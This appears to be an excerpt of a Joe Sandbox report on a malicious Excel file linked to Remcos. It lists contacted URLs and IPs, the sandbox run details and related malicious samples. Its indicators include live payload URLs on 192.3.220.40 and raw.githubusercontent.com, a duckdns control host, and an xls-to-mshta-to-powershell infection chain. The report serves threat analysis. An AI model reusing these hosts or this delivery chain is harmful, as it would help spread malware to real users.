                                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv8F64.tmp.24.drfalseunknown
                                    http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv8F64.tmp.24.drfalseunknown
                                    http://www.nirsoft.netRegAsm.exe, 00000018.00000002.490099696.0000000000234000.00000004.00000010.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://deff.nelreports.net/api/report?cat=msnbhv8F64.tmp.24.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv8F64.tmp.24.drfalse
                                        		unknown
                                        http://go.microspowershell.exe, 00000005.00000002.450249616.0000000002F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                          		unknown
                                          http://cache.btrll.com/default/Pix-1x1.gifbhv8F64.tmp.24.drfalse
                                            		unknown
                                            http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv8F64.tmp.24.drfalse
                                              		unknown
                                              https://www.google.comRegAsm.exe, RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                		unknown
                                                http://geoplugin.net/json.gp/Cpowershell.exe, 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgXpowershell.exe, 0000000E.00000002.477794394.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.00000000026D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://o.aolcdn.com/ads/adswrappermsni.jsbhv8F64.tmp.24.drfalse
                                                    		unknown
                                                    http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv8F64.tmp.24.drfalse
                                                      		unknown
                                                      http://www.msn.com/?ocid=iehpbhv8F64.tmp.24.drfalse
                                                        		unknown
                                                        https://contoso.com/powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.450249616.00000000022DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv8F64.tmp.24.drfalse
                                                          		unknown
                                                          http://static.chartbeat.com/js/chartbeat.jsbhv8F64.tmp.24.drfalse
                                                            		unknown
                                                            http://www.msn.com/de-de/?ocid=iehpbhv8F64.tmp.24.drfalse
                                                              		unknown
                                                              http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta1.1mshta.exe, 0000000F.00000003.477311950.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473557209.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479193905.00000000032BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv8F64.tmp.24.drfalse
                                                                  		unknown
                                                                  https://login.yahoo.com/config/loginRegAsm.exefalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.nirsoft.net/RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.450249616.00000000020D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.536986295.000000000254D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.477794394.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.494980205.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.536957265.0000000002300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.0000000002512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv8F64.tmp.24.drfalse
                                                                      		unknown
                                                                      http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv8F64.tmp.24.drfalse
                                                                        		unknown
                                                                        http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv8F64.tmp.24.drfalse
                                                                          		unknown
                                                                          https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv8F64.tmp.24.drfalse
                                                                            		unknown
                                                                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv8F64.tmp.24.drfalse
                                                                              		unknown
                                                                              http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv8F64.tmp.24.drfalse
                                                                                		unknown
                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.450249616.00000000022DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://192.3.220.40/mshta.exe, 00000004.00000003.428299496.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://www.ccleaner.com/go/app_cc_pro_trialkeybhv8F64.tmp.24.drfalse
                                                                                    		unknown
                                                                                    http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFppowershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.494980205.00000000027D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://jfm.com.co/mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429232968.0000000000509000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428720236.0000000000509000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://192.3.220.40powershell.exe, 0000000E.00000002.477794394.0000000002997000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.00000000028A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://contextual.media.net/8/nrrV73987.jsbhv8F64.tmp.24.drfalse
                                                                                            		unknown
                                                                                            http://www.imvu.comRegAsm.exe, RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000001A.00000002.485113430.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://contoso.com/Iconpowershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://contextual.media.net/bhv8F64.tmp.24.drfalse
                                                                                              		unknown
                                                                                              http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv8F64.tmp.24.drfalse
                                                                                                		unknown
                                                                                                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv8F64.tmp.24.drfalse
                                                                                                  		unknown
                                                                                                  http://www.imvu.com/sKRegAsm.exe, 0000001A.00000002.484892506.000000000036C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://www.msn.com/bhv8F64.tmp.24.drfalse
                                                                                                      		unknown
                                                                                                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv8F64.tmp.24.drfalse
                                                                                                        		unknown
                                                                                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://jfm.com.co/k3l?&alloy=handsome&c037002451082_10142024.xls, 7D330000.0.drfalse
                                                                                                            		unknown
                                                                                                            http://geoplugin.net/json.gp0iRegAsm.exe, 00000014.00000002.649655222.0000000000855000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv8F64.tmp.24.drfalse
                                                                                                                		unknown
                                                                                                                https://raw.githubusercontent.compowershell.exe, 0000000E.00000002.477794394.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.00000000026D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=oranmshta.exe, 0000000F.00000002.478469673.00000000003CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htahttp://192.3.220.40/450/ec/networmshta.exe, 00000004.00000003.428115448.0000000002765000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428477913.0000000002765000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473307044.00000000021E5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471912655.00000000021E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://192.3.220.40/Qmshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://cdn.at.atwola.com/_media/uac/msn.htmlbhv8F64.tmp.24.drfalse
                                                                                                                          		unknown
                                                                                                                          https://www.google.com/accounts/serviceloginRegAsm.exefalse
                                                                                                                            		unknown
                                                                                                                            http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta...mshta.exe, 00000004.00000003.428720236.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429232968.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv8F64.tmp.24.drfalse
                                                                                                                                		unknown
                                                                                                                                https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.523357384.000000001A680000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.525828262.000000001ABED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://policies.yahoo.com/w3c/p3p.xmlbhv8F64.tmp.24.drfalse
                                                                                                                                  		unknown
                                                                                                                                  http://192.3.220.40/450/seethebepowershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.494980205.00000000027D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.msn.com/advertisement.ad.jsbhv8F64.tmp.24.drfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown

                                                                                                                                      World Map of Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public IPs

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      135.148.195.248
                                                                                                                                      		idabo.duckdns.orgUnited States
                                                                                                                                      		18676AVAYAUStrue
                                                                                                                                      185.199.108.133
                                                                                                                                      		raw.githubusercontent.comNetherlands
                                                                                                                                      		54113FASTLYUStrue
                                                                                                                                      178.237.33.50
                                                                                                                                      		geoplugin.netNetherlands
                                                                                                                                      		8455ATOM86-ASATOM86NLfalse
                                                                                                                                      150.136.81.248
                                                                                                                                      		jfm.com.coUnited States
                                                                                                                                      		31898ORACLE-BMC-31898USfalse
                                                                                                                                      192.3.220.40
                                                                                                                                      		unknownUnited States
                                                                                                                                      		36352AS-COLOCROSSINGUStrue

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                      Analysis ID:1533041
                                                                                                                                      Start date and time:2024-10-14 11:04:14 +02:00
                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 10m 20s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                      Number of analysed new started processes analysed:34
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • GSI enabled (VBA)
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample name:037002451082_10142024.xls
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.rans.phis.troj.spyw.expl.evad.winXLS@41/49@8/5
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 77.8%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 99%
                                                                                                                                      • Number of executed functions: 172
                                                                                                                                      • Number of non-executed functions: 324
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                      • Changed system and user locale, location and keyboard layout to French - France
                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                      • Attach to Office via COM
                                                                                                                                      • Active ActiveX Object
                                                                                                                                      • Active ActiveX Object
                                                                                                                                      • Scroll down
                                                                                                                                      • Close Viewer

                                                                                                                                      Warnings

                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                                                                                      • Execution Graph export aborted for target mshta.exe, PID 2764 because there are no executed function
                                                                                                                                      • Execution Graph export aborted for target mshta.exe, PID 3456 because there are no executed function
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      05:05:43API Interceptor86x Sleep call for process: mshta.exe modified
                                                                                                                                      05:05:46API Interceptor596x Sleep call for process: powershell.exe modified
                                                                                                                                      05:05:57API Interceptor17x Sleep call for process: wscript.exe modified
                                                                                                                                      05:06:10API Interceptor471143x Sleep call for process: RegAsm.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      135.148.195.248QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                        DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                          PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                            gwfe4fo1Sp.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.22755.22546.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                SecuriteInfo.com.Trojan-Downloader.Office.Doc.20731.18439.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.3511.17688.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                    QPS366349.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.13950.5767.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                        SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.14420.14138.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                                                          185.199.108.133SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    https://www.newtonsoft.com/jsonGet hashmaliciousUnknownBrowse
                                                                                                                                                                      http://www.cottesloecounselling.com.au/anna-amhrose.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                        klYCjbl66s.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                            GsZkXAmf61.exeGet hashmaliciousCelestial RatBrowse
                                                                                                                                                                              178.237.33.50Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                                              WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                                              BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                                              na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                                              PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                                              STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                                              narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • geoplugin.net/json.gp
